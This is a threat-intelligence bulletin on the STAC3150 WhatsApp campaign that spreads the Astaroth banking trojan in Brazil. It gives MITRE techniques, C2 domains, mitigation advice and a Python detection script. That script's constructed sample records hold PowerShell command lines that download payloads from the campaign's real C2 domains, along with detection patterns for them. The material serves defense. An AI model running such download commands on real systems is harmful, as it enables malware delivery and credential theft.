🔴 HIGH | intel

WhatsApp STAC3150 Campaign Deploys Astaroth Banking Trojan

A persistent malware distribution campaign tracked as STAC3150 is targeting WhatsApp users, primarily in Brazil, using multi-stage infection flows that ultimately deploy the Astaroth (Guildma) banking trojan. Sophos reports that attackers initiate the attack through WhatsApp “View Once” messages containing malicious archive files. Once opened, the embedded VBS or HTA scripts execute PowerShell commands that retrieve secondary payloads, leveraging MITRE ATT&CK techniques like T1059.001 (PowerShell), T1105 (Ingress Tool Transfer), and T1566.002 (Phishing via messaging platforms).

The second-stage payloads include scripts that harvest WhatsApp contacts, session tokens, and browser data. Later phases of the campaign introduce MSI installers that deploy the Astaroth trojan via disguised AutoIt loaders. Astaroth is known for stealthy credential theft, dynamic C2 communication, and evasion tactics that disable security tooling. Researchers observed the malware communicating with attacker-controlled C2 domains such as manoelimoveiscaioba[.]com and varegjopeaks[.]com. The campaign demonstrates significant evolution, transitioning from IMAP-based payload delivery to HTTP requests executed via PowerShell’s Invoke-WebRequest.

The business impact is substantial for organizations with employees who use personal devices for communication or work. Astaroth can capture email credentials, browser session data, corporate MFA prompts, and stored secrets, enabling attackers to compromise enterprise email, VPNs, and cloud accounts. Compliance exposure arises from unauthorized access to regulated data and account hijacking events enabled by compromised credentials.

Mitigation requires organizations to educate employees about archive-based phishing lures sent through messaging apps, enforce mobile endpoint protection policies, and block IoCs associated with the STAC3150 campaign. Security teams should monitor for PowerShell-based download activity, implement application control restrictions for script interpreters, and deploy behavioral EDR detections tuned for Astaroth’s workflow.
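The detection guidance above can be turned into a concrete hunting rule. The following is an added example, not code from the Sophos report or the CORTEX assessment: it scans process-creation records (Sysmon Event ID 1 style, flattened here to one key=value line per event, a format assumed for this example) for the chain the report describes, a script interpreter (wscript, cscript or mshta) spawning PowerShell that fetches a payload with Invoke-WebRequest (T1059.001 plus T1105), and flags any command line that references the two C2 domains published in the report. The sample records, the `parse_record` format and the rule names are constructed for this example.

```python
"""Added example (not the report's or the vendor's code): a small detector
for the STAC3150 chain over constructed process-creation records."""
import re
from dataclasses import dataclass

# C2 domains exactly as published in the report (defanged); refanged only at match time.
C2_DOMAINS_DEFANGED = ("manoelimoveiscaioba[.]com", "varegjopeaks[.]com")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}   # launchers for VBS / HTA lures
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Invoke-WebRequest (or its iwr alias) followed by an http(s) URL: T1105 via T1059.001.
DOWNLOAD_RE = re.compile(r"\b(?:Invoke-WebRequest|iwr)\b.*?https?://", re.IGNORECASE)


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('example[.]com') back into a matchable domain."""
    return indicator.replace("[.]", ".").lower()


C2_DOMAINS = {refang(d) for d in C2_DOMAINS_DEFANGED}


@dataclass(frozen=True)
class Finding:
    line: int        # 1-based index of the record that triggered the rule
    rule: str
    technique: str   # MITRE ATT&CK technique, or "IoC" for a domain hit
    detail: str


def parse_record(line: str) -> dict:
    """Parse 'Key=Value|Key=Value|...' (constructed format; values contain no '|')."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(line_no: int, record: dict) -> list:
    """Apply the three rules to one parsed record and return the findings."""
    parent = basename(record.get("ParentImage", ""))
    child = basename(record.get("Image", ""))
    cmd = record.get("CommandLine", "")
    findings = []
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        findings.append(Finding(line_no, "script-host-spawns-powershell", "T1059.001",
                                f"{parent} -> {child}"))
    if child in POWERSHELL and DOWNLOAD_RE.search(cmd):
        findings.append(Finding(line_no, "powershell-web-download", "T1105", cmd))
    lowered = cmd.lower()
    for domain in sorted(C2_DOMAINS):
        if domain in lowered:
            findings.append(Finding(line_no, "known-c2-domain", "IoC", domain))
    return findings


def scan(lines) -> list:
    """Run analyze() over every non-empty record and collect all findings."""
    hits = []
    for n, line in enumerate(lines, start=1):
        if line.strip():
            hits.extend(analyze(n, parse_record(line)))
    return hits


# Constructed sample records: two STAC3150-like chains (1 and 3) and two benign events.
SAMPLE_LINES = [
    r'ParentImage=C:\Windows\System32\wscript.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -w hidden -c "Invoke-WebRequest -Uri http://varegjopeaks.com/stage2 -OutFile $env:TEMP\s2.ps1"',
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -File C:\Scripts\nightly-backup.ps1',
    r'ParentImage=C:\Windows\System32\mshta.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -nop -c "iwr https://manoelimoveiscaioba.com/a -UseBasicParsing"',
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Mozilla Firefox\firefox.exe|CommandLine="C:\Program Files\Mozilla Firefox\firefox.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"record {f.line}: {f.rule} [{f.technique}] {f.detail}")
```

The parent/child rule and the download rule are behavioral and survive a change of C2 infrastructure; the domain rule is the cheap IoC match and should be expected to age quickly. In production the `parse_record` step would be replaced by the SIEM's own field extraction, and the benign `explorer.exe -> powershell.exe -File` record shows why the download rule is keyed on a URL rather than on PowerShell launches alone.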

🎯CORTEX Protocol Intelligence Assessment

Business Impact: Compromised devices can leak credentials and session tokens that grant attackers access to enterprise systems. Astaroth’s stealthy profile increases the risk of long-term unauthorized access.

Technical Context: The campaign leverages multi-stage scripting mapped to MITRE T1059.001 and T1105, culminating in Astaroth deployment via AutoIt-based loaders.

Strategic Intelligence Guidance

  • Block malicious WhatsApp-related IoCs and domains associated with STAC3150.
  • Restrict PowerShell execution and implement application control for script engines.
  • Deploy mobile EDR tools capable of detecting WhatsApp session hijacking.
  • Educate users on messaging-based phishing and discourage archive file execution.

Vendors

WhatsApp

Threats

Astaroth, STAC3150

Targets

WhatsApp users, Brazilian organizations